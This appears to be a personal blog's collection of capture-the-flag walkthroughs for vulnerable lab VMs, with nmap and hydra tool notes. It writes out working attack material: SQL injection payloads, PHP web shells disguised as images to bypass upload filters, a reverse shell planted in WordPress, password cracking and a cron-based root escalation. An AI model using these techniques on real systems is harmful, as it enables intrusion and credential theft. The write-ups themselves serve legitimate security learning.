Walkthrough SkyDog Con CTF – The Legend Begins

Okay, I wish I could say that I really solved this but I didn’t get all the flags. But I am going to do a write up anyways, to not forget what I learned.

The CTF is called SkyDog Con CTF – The Legend Begins, and can be found here. Thanks James Bower for a fun CTF!

Instructions

The CTF is a virtual machine and works best in Virtual Box. This OVA was created using Virtual Box 4.3.32. Download the OVA file open up Virtual Box and then select File –> Import Appliance. Choose the OVA file from where you downloaded it. After importing the OVA file above it is best to disable the USB 2.0 setting before booting up the VM. The networking is setup for a NAT Network but you can change this before booting up depending on your networking setup. If you have any questions please send me a message on Twitter @jamesbower and I’ll be happy to help.

Goal of Sky Dog Con CTF

The purpose of this CTF is to find all six flags hidden throughout the server by hacking network and system services. This can be achieved without hacking the VM file itself.

Flags

The six flags are in the form of flag{MD5 Hash} such as flag{1a79a4d60de6718e8e5b326e338ae533

Flag #1 Home Sweet Home or (A Picture is Worth a Thousand Words)
Flag #2 When do Androids Learn to Walk?
Flag #3 Who Can You Trust?
Flag #4 Who Doesn’t Love a Good Cocktail Party?
Flag #5 Another Day at the Office
Flag #6 Little Black Box

First flag

Let’s search the network and scan the machine.

$ nmap -v 192.168.1.1/24                                                                                                [19:03:49]

Nmap scan report for 192.168.1.108
Host is up (0.0053s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

$ nmap -A -T4 -v -p- 192.168.1.108                                                                                      [19:06:08]

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 c8:f7:5b:33:8a:5a:0c:03:bb:6b:af:2d:a9:70:d3:01 (DSA)
|   2048 01:9f:dd:98:ba:be:de:22:4a:48:4b:be:8d:1a:47:f4 (RSA)
|_  256 f8:a9:65:a5:7c:50:1d:fd:71:57:92:38:8b:ee:8c:0a (ECDSA)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 252 disallowed entries (15 shown)
| /search /sdch /groups /catalogs /catalogues /news /nwshp
| /setnewsprefs? /index.html? /? /?hl=*& /?hl=*&*&gws_rd=ssl
|_/addurl/image? /mail/ /pagead/
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Okay, so we got ssh and port 80. Nmap also reveled that there’s a lot of action in robots.

But first I want to check out port 80.
On the first page there is a image. I remember the name of the first flag: “Flag #1 Home Sweet Home or (A Picture is Worth a Thousand Words)”. Okay, so I download the image and check it out in exiftool.

wget http://skydog.dev/SkyDogCon_CTF.jpg

exiftool SkyDogCon_CTF.jpg

And BAM first flag. Found in the comment.

XP Comment                      : flag{abc40a2d4e023b42bd1ff04891549ae2}

This is when I started getting cocky. If it is this easy, it’s gonna be a breeze. Shame on me.

Now I check out the robots.txt file. And BOOM another flag.

# Congrats Mr. Bishop, your getting good - flag{cd4f10fcba234f0e8b2f60a490c306e6}

So in the robots file there was a lot of entries.

Many of them looked like this:

For example stuff like this
Allow: /?hl=*&gws_rd=ssl$
Disallow: /?hl=*&*&gws_rd=ssl
Allow: /?gws_rd=ssl$
Allow: /?pt1=true$

I was sure that this was meant for some sql-injections. So I fired up sqlmapping, but nothing.

So I figured that I would see which of all the pages worked, because most of them 404ed. So in order to do that in a efficient way (and inefficient, since nikto already told me which pages responded with 200) I figured that it would be fun to do it with bash.

There are probably a million ways to write this code in a better way. But it worked for me.

First I used cut to cut out all the urls and store them in a file I called robbo.

cut -d/ -f2-5 robots.txt > robbo 

Then I wrote and ran this little script, which outputs the headers of the requests into the file output.

#!/bin/bash

while read p; do
  #echo $p
  echo http://skydog.dev/"$p" >> output
  curl --head http://skydog.dev/"$p" >> output
done <robbo

Then I ran grep on that file to show me all the 200s.

grep 200 -A 3 -B 3 output

So yeah, not very efficient. But it led me to this url: http://skydog.dev/Setec/
But that was not really thanks to my crappy script. I had found it when I used the spider in ZAP as well. Anyways, that page led me to this: http://skydog.dev/Setec/Astronomy/ where I found the zipfile Whistler.zip.

I downloaded it and tried to open it. But it required a password. So I started googeling and found fcrackzip. And I started playing around with it. But in the end I ran the wrong command

$ fcrackzip -D -p rockyou.txt Whistler.zip

possible pw found: yourmother ()
possible pw found: jinglebells ()
possible pw found: 200595 ()
possible pw found: spellman ()
possible pw found: jenny86 ()
possible pw found: julie10 ()
possible pw found: nascar7 ()
possible pw found: millie25 ()
possible pw found: hackett1 ()
possible pw found: chrebet ()

It just returned tens of possible passwords.

I should have run it like this:

fcrackzip -D -v -u -p rockyou.txt Whistler.zip

found file 'flag.txt', (size cp/uc     50/    38, flags 9, chk 874a)
found file 'QuesttoFindCosmo.txt', (size cp/uc     72/    61, flags 9, chk 83b5)


PASSWORD FOUND!!!!: pw == yourmother

Yeah I was stuck here and though that there was something wrong with the program or something. So I cheated a bit and learned the correct way to use fcrackzip.

I got the flag: flag{1871a3c1da602bf471d3d76cc60cdb9b}% and a clue for the next flag:
“Time to break out those binoculars and start doing some OSINT% ”

So I started googeling about OSINT.
Osint stand for Open Source Intelligence. Something I didn’t know of before reading about it. After reading about it on wikipedia I gather that it doesn’t concern what programmers know of open source. It means more like public. Like public information gathering. It comes from the intelligence community.

Here I got really stuck again. And so I cheated. Again. Sorry.
I read in another walkthrough that he had taken out words from the movie sneakers imdb and ran it through dirbuster.

So I did that as well.

I took the movie script and downloaded it. Then I wrote the following bash-script:

#!/bin/bash

for word in $(<sound.txt)
do
    echo "$word" >> sneakersWord2.txt
done

It takes sound.txt as input and lines up each word in the file sneakers.txt. Which I then used in ZAP.

So I found the path:

/PlayTronics/

In /PlayTronics I got the flag:
http://skydog.dev/PlayTronics/flag.txt
And the next clue. http://skydog.dev/PlayTronics/companytraffic.pcap
A package capture of network traffic. So I ran:

tcpick -C -yP -r companytraffic.pcap > companytraffic.txt                                                             

And started poking around in it with grep. But yeah. I didn’t really get anywhere with it. This is where I just gave up.

If you want to find the rest of the flags check out g0blins great write-up if you haven’t already.

Conclusion

I really made a lot of mistakes on this one, and some stuff was just over my head. Like somehow remaking the sound-clip from the pcap-file. That would have been cool to do.
I would have easily gotten the zip-file if I just had learned the tool a bit better.
I should also have read the instructions better! If I had done that I would have figured out that I of course should have tried to crack the MD5 hashes.

I got to play around with some more unix commands like cut, and writing a bit in bash which is always useful. I also got to try out fcrackzip, although I doubt it will ever be useful. It seems like a really old technology.

So all in all a fun CTF and I learned some more. Which in the end is the most important thing.

Walkthrough Freshly

I did another vulnerable VM. This one is called Freshly and can be found here. It is also made by tophatsec, so thanks tophatsec for another great VM. Let’s get started.

First let’s find the machine.

nmap 192.168.1.1/24

Great, now that we got the ip, let’s scan it.

nmap -A -T4 -p- 192.168.1.107                        [12:17:27]

Starting Nmap 7.00 ( https://nmap.org ) at 2016-04-24 12:18 CLST
Nmap scan report for 192.168.1.107
Host is up (0.00058s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE  VERSION
80/tcp   open  http     Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
443/tcp  open  ssl/http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-02-17T03:30:05
|_Not valid after:  2025-02-14T03:30:05
8080/tcp open  http     Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.45 seconds

Okay, so we have a port 80, and SSL-port 443, and port 8080. All web.
On port 80 there is just a star-wars gif. I download it and check it out if exiftool just in case. But nothing of interest.

I fire up ZAP and start doing a Force Browse (DirBusting).
Meanwhile I check out port 8080 and port 443. Both of them seem to lead to a wordpress-installation. I snoop around and find that there is a user named admin (the default user in wordpress). I try to login with admin/admin in /wp-admin but no result. I also try a dictionary-attack but without any luck. But I am not blocked out, so that means there are no plugins with fail2ban -features.

I try some sqlinjections in the store but without success.

So I go back to ZAP to see what it has found. And I can see that it has found a page called /login.php and phpmyadmin. So I head over to login.php and find a login. I use sqlmap to see if there are any vulnerabilities.

So I make a request and the intercept it in burp suite, and copypaste the request to a file I call request.txt. “user” is the parameter that I am testing for injections.

./sqlmap.py -r request.txt -p user

Okay, so sqlmap found a time-based blind.

---
Parameter: user (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: user=' AND (SELECT * FROM (SELECT(SLEEP(5)))RRpU) AND 'wUfW'='wUfW&password=&s=Submit
---

I had never successfully used sqlmap before, so this was a great learning experience. So after finding out that there is a vulnerability I run the following command to get the databases. It really took a long time because it was a time-based attack.

./sqlmap.py -r request.txt -p user --dbs 

Output:

available databases [7]:
[*] information_schema
[*] login
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] users
[*] wordpress8080

Then I wanted the tables and the content, so I ran:

./sqlmap.py -r request.txt -p user --tables -D wordpress8080

Database: wordpress8080
[1 table]
+-------+
| users |
+-------+
./sqlmap.py -r request.txt -p user --dump -D wordpress8080 -T users                                  [18:45:53]
Database: wordpress8080
Table: users
[1 entry]
+----------+---------------------+
| username | password            |
+----------+---------------------+
| admin    | SuperSecretPassword |
+----------+---------------------+

So yeah, not so secret password. I used it to login to wordpress.
This guide was quite useful to get the hang of sqlmap.

So, admin on a CMS usually means shell. So I went to appearance/editor and then I just copy-pasted my reverse shell into header.php. Probably not the most silent way, but it is easy to remove the code after it has been executed.
Then I fired up netcat. With:

nc -v -l 1234

-v stands for verbose. -l for listening. And 1234 is the port. The -p flag is not really needed to define the port.

Make sure that your firewall is open.

sudo ufw allow 1234

So, now I got a shell with the user daemon

uid=1(daemon) gid=1(daemon) groups=1(daemon)

I create a file in /tmp called linEnum.sh where I copypaste the linEnum-file. Then:

chmod +x linEnum.sh
./linEnum.sh

To enumerate important and interesting files. It outputs a lot of stuff, among others this:
/etc/passwd

user:x:1000:1000
mysql:x:103:111
candycane:x:1001:1001
# YOU STOLE MY SECRET FILE!
# SECRET = "NOBODY EVER GOES IN, AND NOBODY EVER COMES OUT!"

And the following in /etc/shadow

root:$6$If.Y9A3d$L1/qOTmhdbImaWb40Wit6A/wP5tY5Ia0LB9HvZvl1xAGFKGP5hm9aqwvFtDIRKJaWkN8cuqF6wMvjl1gxtoR7/:16483:0:99999:7:::
user:$6$MuqQZq4i$t/lNztnPTqUCvKeO/vvHd9nVe3yRoES5fEguxxHnOf3jR/zUl0SFs825OM4MuCWlV7H/k2QCKiZ3zso.31Kk31:16483:0:99999:7:::
mysql:!:16483:0:99999:7:::
candycane:$6$gfTgfe6A$pAMHjwh3aQV1lFXtuNDZVYyEqxLWd957MSFvPiPaP5ioh7tPOwK2TxsexorYiB0zTiQWaaBxwOCTRCIVykhRa/:16483:0:99999:7:::

There is also a message in the shadow-file:
# YOU STOLE MY PASSWORD FILE!
# SECRET = "NOBODY EVER GOES IN, AND NOBODY EVER COMES OUT!"

I thought I had to reach root, so I didn’t really think of this as the flag. So I copied the hashes and started running hashcat on them, which was fun as it was the first time. So I ran it an all the three hashes, with the following command.

./hashcat-cli64.bin -m 1800 -a 0 -o found.txt --remove candycane.hash ~/sectools/SecLists/Passwords/10_million_password_list_top_100000.txt

I only found the password for candycane which was “password”. I didn’t manage to crack the other users.

Now I wanted to su up for candycane but it didn’t work since I didn’t have a tty-shell. And

import pty; pty.spawn('/bin/bash')

this didn’t work. But I found a workaround.

echo "import pty; pty.spawn('/bin/bash')" > /tmp/shell.py
ptyhon shell.py

So this gave me a tty-shell and I could run su candycane.

So, here I got stuck a while and started looking back in my notes to see if I had missed something. So I took out the content from the databse login

Database: login
Table: users
[2 entries]
+----------+-----------+
| password | user_name |
+----------+-----------+
| password | candyshop |
| PopRocks | Sir       |
+----------+-----------+

And I tried these passwords on user and root. But it didn’t work. After many other tries enumerating the system I gave up. And on some other walkthroughs I found that the password for user (which was a sudo-user) and root was SuperSecretPassword. So that was a little bit annoying that I never tried that. And I also found out that it was the same password for the mysql-root user. Which could be found in the login.php-file. So that was a little bit stupid that I never checked that.

Conclusion

All in all it was a great VM. I got to learn tools like hashcat and sqlmap, which I am sure will come in handy on other VMs. I also learned about wpscan while reading other walkthroughs. I was surprised that SuperSecretPassword was not found in my password-dictionaries that I tried.

Other things that I missed was playing around with phpmyadmin. I read in some other walkthroughs that you could figure out the DBMS from it. That would have been good.

But at least I got the flags.

Walkthrough Zorz

I have been playing around with another vulnerable VM, this one is called Zorz, and can be found here on vulnhub. It is made by Top-hat-sec.

First I imported the VM, but it automatically used eth0, instead of wlan. So once that was changed I could find the machine when I did my scan.

nmap -v 192.168.1.1/24

I have started running nmap in verbose mode, because it can be fun to see how nmap is working, and especially if it is really slow, and I start to doubt that everything is really working as it should.

sudo nmap -A -T4 -p- 192.168.1.104

So this stands for -A: Aggressive, and it includes: OS detection, version detection, script scanning, and traceroute.

-T4 is how fast the scanning should be. -T4 is “aggressive”, but not -T5 “insane”. So it works out fast, but still reliable. Although it doesn’t really matter. I think it is more useful when you need to scan hundreds of networks. In how much of a hurry you are. Granted T0 is slooow. -T3 is the default.

Starting Nmap 7.00 ( https://nmap.org ) at 2016-04-23 21:23 CLST
Nmap scan report for zorz.dev (192.168.1.104)
Host is up (0.0011s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 48:bb:d8:38:b8:25:a6:6c:5e:7f:67:c9:ec:53:cc:ed (DSA)
|   2048 ec:55:48:93:28:90:f6:bf:3c:cd:e3:90:42:26:3b:5d (RSA)
|_  256 3f:0a:11:c9:59:73:be:df:f7:77:59:65:07:91:d7:d6 (ECDSA)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:9A:0D:2F (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS out CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.0
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   1.08 ms zorz.dev (192.168.1.104)

Okay, so we just have ssh and 80. Let’s start ZAP and Dir-browsing, because that can take some time. And let that roll while we checkout the browser.

Challenge 1

So we find three challenges. Three ways to upload images to the server. So I guess that we want to bypass the image-restrictions and upload shells instead.

The first one was really straight-forward. It didn’t really do any check. So I could just upload php-reverse-shell.php without any problems. But where was the file? I continued to play with Challenge 2 and 3. On the third one it says where the file was uploaded. It was uploaded into a dir called uploads3. So I figured the files for challenge 1 and 2 were to be found in uploads1 and uploads 2.

So I opened port 1234 in the firewall with the command:

ufw allow 1234

And then I used netcat to start listening in on that port, and get ready for the shell.

nc -v -l 1234

So -v stands for verbose. -l for listen. So that netcat know that it should listed for a incoming connection, and not establish connection itself. 1234 is the port that it should listen to.
Now we just click on the shell-file in uploads1 and the server connects to netcat.

So year, this was pretty easy. Basically no check whatsoever.

Challenge 2

Now it is getting a bit more difficult. We cannot upload file that does not end with .png, .jpg, .gif.

But instead we can just rename our shell and upload it as shell.php.jpg. It passed the filter and the file is executed as php.

Challenge 3

This challenge was a bit harder. Because somehow it was checking to see if the file itself was an image. I found to ways to bypass this check.
From this great tutorial I learned how to get around it. Basically you just add the text “GIF89a;” before you shell-code. So it would look something like this:

GIF89a;
<?
system($_GET['cmd']);//or you can insert your complete shell code
?>

So that worked and I managed to get a shell up and running.

The second way to beat this challenge is to add the shell-code into a comment of a image-file.

First I looked for a simple jpg file online “jpg file:jpg”. And then I inserted the php-code into the image comment with the following command.

exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' lo.jpg 

Exiftool is a great tool to view and manipulate exif-data.
Then I had to rename the file

mv lo.jpg lo.php.jpg

Then upload it. When I then click on it the browser just outputs jibberish.

http://zorz.dev/uploads1/lo.php.jpg?cmd=ls

So when we run this in the browser it outputs the result on the webpage. So yeah, we have a shell.

Then we can move to
http://zorz.dev/uploads1/lo.php.jpg?cmd=cat%20/var/www/html/l337saucel337/SECRETFILE
And see the win-file.

There are many more tricks to bypass fileupload restrictions. Here are some:
https://pentestlab.wordpress.com/2012/11/29/bypassing-file-upload-restrictions/
http://www.securityidiots.com/Web-Pentest/hacking-website-by-shell-uploading.html

NPM “network tunneling socket”-error

Sometimes when I have tried to download npm-packages I have received the following error:

npm ERR! node v4.3.1
npm ERR! npm  v2.14.12
npm ERR! code ECONNRESET

npm ERR! network tunneling socket could not be established, cause=connect ECONNREFUSED 127.0.0.1:8080
npm ERR! network This is most likely not a problem with npm itself
npm ERR! network and is related to network connectivity.
npm ERR! network In most cases you are behind a proxy or have bad network settings.
npm ERR! network 
npm ERR! network If you are behind a proxy, please make sure that the
npm ERR! network 'proxy' config is set properly.  See: 'npm help config'

npm ERR! Please include the following file with any support request:

Which is strange since I am not behind a proxy. I am not quite sure what the real issue here is. But I have found that a solution for it is:

npm config set proxy false
npm cache clean

This seems to do the trick for me.

Walkthrough Tr0ll VM

This is a walkthrough of the VM Tr0ll. That can be found on vulnhub.

Let’s fire up Virtualbox and boot up the VM.

Mapping

Let’s start by scanning the network to find our server.

nmap 192.168.1.0/24
Nmap scan report for 192.168.1.107
Host is up (0.0067s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http

I usually map the machine to a fake-domain address so that Burp Suite will work.

sudo vim /etc/hosts
192.168.1.107   troll.dev

Okay, so we have three ports showing, after an initial scan. Let’s try all the ports. To make sure we are not missing anything.
The A-flag stands for aggressive. This flag is a combination of -O (OS-detection), -sV (version scanning), -sC (script scanning), and –traceroute.
-p- means that we will check all 65532 ports.

nmap -A -p- 192.168.1.107

#Output
Starting Nmap 7.00 ( https://nmap.org ) at 2016-04-11 21:02 CLST
Nmap scan report for troll.dev (192.168.1.107)
Host is up (0.0070s latency).
Not shown: 65532 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxrwxrwx    1 1000     0            8068 Aug 10  2014 lol.pcap [NSE: writeable]
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 d6:18:d9:ef:75:d3:1c:29:be:14:b5:2b:18:54:a9:c0 (DSA)
|   2048 ee:8c:64:87:44:39:53:8c:24:fe:9d:39:a9:ad:ea:db (RSA)
|_  256 0e:66:e6:50:cf:56:3b:9c:67:8b:5f:56:ca:ae:6b:f4 (ECDSA)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-robots.txt: 1 disallowed entry 
|_/secret
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

FTP

Okay, so we can see that the server is using vsftpd version 3.0.2. Vsftpd is the default ftp-server in many linux-systems. This configuration appears to allow anonymous logins. Which is why we are able to retrieve the file listing of the root directory just by scanning it. So we can see that there is a file called lol.pcap. We will get to this later.

SSH

We can also see that port 22 is open, the standard port for SSH. The version seems to be 6.6.1p1, which is not the latest. Then we can see the host-key of ssh.

HTTP

Okay so it seems port 80 is open. And it runs Apache 2.4.7, on Ubuntu.
It has a robots.txt file, which might be worth checking out.

Okay, so we have two interesting leads here. We have the file lol.pcap on the ftp-server, and we have port 80. So let’s check out the web.
The index-page just gives us a troll-image. I download it and investigate the meta-data of the image. But I find nothing interesting.

wget http://troll.dev/hacker.jpg
exiftool hacker.jpg

Let’s check out the robots file.

User-agent:*
Disallow: /secret

It leads us to secret. But that is just another troll image, and with no interesting meta-data.

lol.pcap

We log in with the user anonymous and don’t need to provide a password.

ftp 192.168.1.107
Connected to 192.168.1.107.
220 (vsFTPd 3.0.2)
Name (192.168.1.107:comp): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rwxrwxrwx    1 1000     0            8068 Aug 10  2014 lol.pcap
226 Directory send OK.
ftp> get lol.pcap
local: lol.pcap remote: lol.pcap
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for lol.pcap (8068 bytes).
226 Transfer complete.
8068 bytes received in 0.00 secs (92693.0 kB/s)

Okay. So now we have the .pcap file on the computer. But what is a pcap file?
Pcap stands for “Package Capture”. Which means that it is a file filled with packages that has been captured and saved in the file. So we are able to analyze network packages after they have been sent. So in order to make any sense of this file we need a program to open it with. Wireshark is popular to use. But I don’t have it on this computer, so instead I use tcpick. Tcpick is just like wireshark, a tcp stream sniffer.

We run the following command. C stands for color. -yP for viewing package in printable characters. and -r to read a file.

tcpick -C -yP -r lol.pcap

Here is the output:

tcpick: reading from lol.pcap
1      SYN-SENT       10.0.0.12:52449 > 10.0.0.6:ftp
1      SYN-RECEIVED   10.0.0.12:52449 > 10.0.0.6:ftp
1      ESTABLISHED    10.0.0.12:52449 > 10.0.0.6:ftp
220 (vsFTPd 3.0.2)
USER anonymous
331 Please specify the password.
PASS password
230 Login successful.
SYST
215 UNIX Type: L8
PORT 10,0,0,12,173,198
200 PORT command successful. Consider using PASV.
LIST
2      SYN-SENT       10.0.0.6:ftp-data > 10.0.0.12:44486
2      SYN-RECEIVED   10.0.0.6:ftp-data > 10.0.0.12:44486
2      ESTABLISHED    10.0.0.6:ftp-data > 10.0.0.12:44486
150 Here comes the directory listing.
-rw-r--r--    1 0        0             147 Aug 10 00:38 secret_stuff.txt
2      FIN-WAIT-1     10.0.0.6:ftp-data > 10.0.0.12:44486
2      FIN-WAIT-2     10.0.0.6:ftp-data > 10.0.0.12:44486
2      TIME-WAIT      10.0.0.6:ftp-data > 10.0.0.12:44486
2      CLOSED         10.0.0.6:ftp-data > 10.0.0.12:44486
226 Directory send OK.
TYPE I
200 Switching to Binary mode.
PORT 10,0,0,12,202,172
200 PORT command successful. Consider using PASV.
RETR secret_stuff.txt
3      SYN-SENT       10.0.0.6:ftp-data > 10.0.0.12:51884
3      SYN-RECEIVED   10.0.0.6:ftp-data > 10.0.0.12:51884
3      ESTABLISHED    10.0.0.6:ftp-data > 10.0.0.12:51884
150 Opening BINARY mode data connection for secret_stuff.txt (147 bytes).
Well, well, well, aren't you just a clever little devil, you almost found the sup3rs3cr3tdirlol 😛

Sucks, you were so close... gotta TRY HARDER!
3      FIN-WAIT-1     10.0.0.6:ftp-data > 10.0.0.12:51884
3      TIME-WAIT      10.0.0.6:ftp-data > 10.0.0.12:51884
3      CLOSED         10.0.0.6:ftp-data > 10.0.0.12:51884
226 Transfer complete.
TYPE A
200 Switching to ASCII mode.
PORT 10,0,0,12,172,74
200 PORT command successful. Consider using PASV.
LIST
4      SYN-SENT       10.0.0.6:ftp-data > 10.0.0.12:44106
4      SYN-RECEIVED   10.0.0.6:ftp-data > 10.0.0.12:44106
4      ESTABLISHED    10.0.0.6:ftp-data > 10.0.0.12:44106
150 Here comes the directory listing.
-rw-r--r--    1 0        0             147 Aug 10 00:38 secret_stuff.txt
4      FIN-WAIT-1     10.0.0.6:ftp-data > 10.0.0.12:44106
4      TIME-WAIT      10.0.0.6:ftp-data > 10.0.0.12:44106
4      CLOSED         10.0.0.6:ftp-data > 10.0.0.12:44106
226 Directory send OK.
QUIT
221 Goodbye.
1      FIN-WAIT-1     10.0.0.12:52449 > 10.0.0.6:ftp
1      TIME-WAIT      10.0.0.12:52449 > 10.0.0.6:ftp
1      CLOSED         10.0.0.12:52449 > 10.0.0.6:ftp
tcpick: done reading from lol.pcap

67 packets captured
4 tcp sessions detected

So we can see here that someone has logged in as anonymous.
And listed all the files in a directory, and it contains the mysterous file secret_stuff.txt.
It also contains a little message from our troll that talks about a supersecretdir.

-rw-r--r--    1 0        0             147 Aug 10 00:38 secret_stuff.txt
Well, well, well, aren't you just a clever little devil, you almost found the sup3rs3cr3tdirlol 😛

Okay, so a supersecret directory. Let’s check it out in the browser.

Okay, is shows us a directory with a file called roflmao. Let’s download it.

$ file roflmao                                                                                                           
roflmao: ELF 32-bit LSB  executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=5e14420eaa59e599c2f508490483d959f3d2cf4f, not stripped

Okay. So it is an executable. Let’s execute it then

chmod +x roflmao
./roflmao
#It returns
Find address 0x0856BF to proceed%

It looks like a hexadecimal value. But where to use it?
I convert it to decimals using python

print int("0x0856BF", 16)
#Output:
546495

That number does’t really say me anything.

Okay, so I try both decimal and hexadecimal numbers in the browser. http://troll.dev/0x0856BF/ leads me to a directory with a text of what I suppose is passwords.
http://troll.dev/0x0856BF/good_luck/which_one_lol.txt

maleus
ps-aux
felux
Eagle11
genphlux < -- Definitely not this one
usmc8892
blawrg
wytshadow
vis1t0r
overflow

It could be passwords, or usernames. In the other folder there is a dir called: his_folder_contains_the_password/ with the file Pass.txt in it.

I figure the next step must be ssh. So after trying many different combinations, which was made harder by the fact that the server has some kind of fail2ban mechanism installed, I figured the username was overflow and the password was Pass.txt.

Okay. So we get a shell, but it is a pretty crappy one so I just write bash and it gives me a bash-shell. Great!

Enumeration and Privilege Escalation

Okay, so we have a shell and we are in. But after a few minutes we are kicked out. I guess there is a cronjob doing it.
Let’s see what other users we have.

sudo -v
Sorry, user overflow may not run sudo on troll.

cat /etc/passwd
troll:x:1000:1000:Tr0ll,,,:/home/troll:/bin/bash
lololol:x:1001:1001::/home/lololol:
overflow:x:1002:1002::/home/overflow:
ps-aux:x:1003:1003::/home/ps-aux:
maleus:x:1004:1004::/home/maleus:
felux:x:1005:1005::/home/felux:
Eagle11:x:1006:1006::/home/Eagle11:
genphlux:x:1007:1007::/home/genphlux:
usmc8892:x:1008:1008::/home/usmc8892:
blawrg:x:1009:1009::/home/blawrg:
wytshadow:x:1010:1010::/home/wytshadow:
vis1t0r:x:1011:1011::/home/vis1t0r:

I have removed all users that are root and system-users. So we are left with 12 users. All part of their own groups.
I can’t find out if any of them are sudo users because I don’t have permission to view /etc/sudoers. We can also tell that the passwords are encrypted and in the shadow file, that we don’t have access to.

Let’s look

$ find / -writable -type d 2>/dev/null
/tmp
/run/user/1002
/run/shm
/run/lock
/var/tmp
/sys/fs/cgroup/systemd/user/1002.user/10.session
/proc/4981/task/4981/fd
/proc/4981/fd
/proc/4981/map_files

Let’s see what in /var/tmp.

overflow@troll:/tmp$ cd /var/tmp
overflow@troll:/var/tmp$ ls
cleaner.py.swp
overflow@troll:/var/tmp$ cat cleaner.py.swp 
crontab for cleaner.py successful

overflow@troll:/var/tmp$ find / -iname cleaner.py 2>/dev/null
/lib/log/cleaner.py

overflow@troll:/lib/log$ cat cleaner.py 
#!/usr/bin/env python
import os
import sys
try:
	os.system('rm -r /tmp/* ')
except:
	sys.exit()
overflow@troll:/lib/log$ 

I ran a few other commands as well looking for setuid files. Those commands can be found on this amazing page.

Okay, so we have a file that is owned by root and run as a cron every time I get kicked out. So maybe I can just make myself sudo.

import os
os.system("sudo usermod -aG sudo overflow")

Now I just wait for the cronjob to kick me out and run the code.
So I get kicked out and then I just run:

sudo su

And I am root.

How to use hydra to perform dictionary attacks

So I have been playing around with some vulnerable VMs (from the awesome vulnhub.com. Some of them have had ftp and ssh services running on them. So I have tried to make dictionary attacks against them.

First we need some dictionaries with passwords. Here is a great collection of dictionaries/password-lists

This is the basic syntax. So first we add the list with usernames. Then the list of passwords. Then the ip. Then we specify the port (-s) then the service (in this case ssh). -V is for verbose mode.
The -s is only needed if the service is on another port than the default.

hydra -L userlist.txt -P best1050.txt 192.168.1.103 -s 45061 ssh -V

The man page is really quite useful.

Nmap commands

Find hosts/devices on the network

nmap -sP 192.168.0.1/24
To find out what devices are on the network you need to know the ip of the router.
Here are some common:
10.0.1.1
10.0.0.2
10.0.0.138
192.168.0.1
192.168.1.1
192.168.1.10.1
192.168.11.1
192.168.2.1
192.168.3.1
192.168.1.254
192.168.254.254

Here is a more complete list, and according to model.
For default usernames and passwords check here.

Scan for open ports

The most simple of commands to check for some standard ports is:

nmap 192.168.0.103

But that does not check all of the possible ports.

nmap -p 1-65535 192.168.0.164

Or decide what ports you do want to check.

Check what service uses a specific port

Let’s say we find some open ports. But the port is either to high to have a specific service. Or it is on a port that is not usually used for it. For example, a lot of people are moving their ssh to not be port 22 to avoid spam-attacks.

45061/tcp open  unknown

So we just add the -sV flag.

sudo nmap -sV -p 45061 192.168.1.103

Here is the Nmap-documentation for it.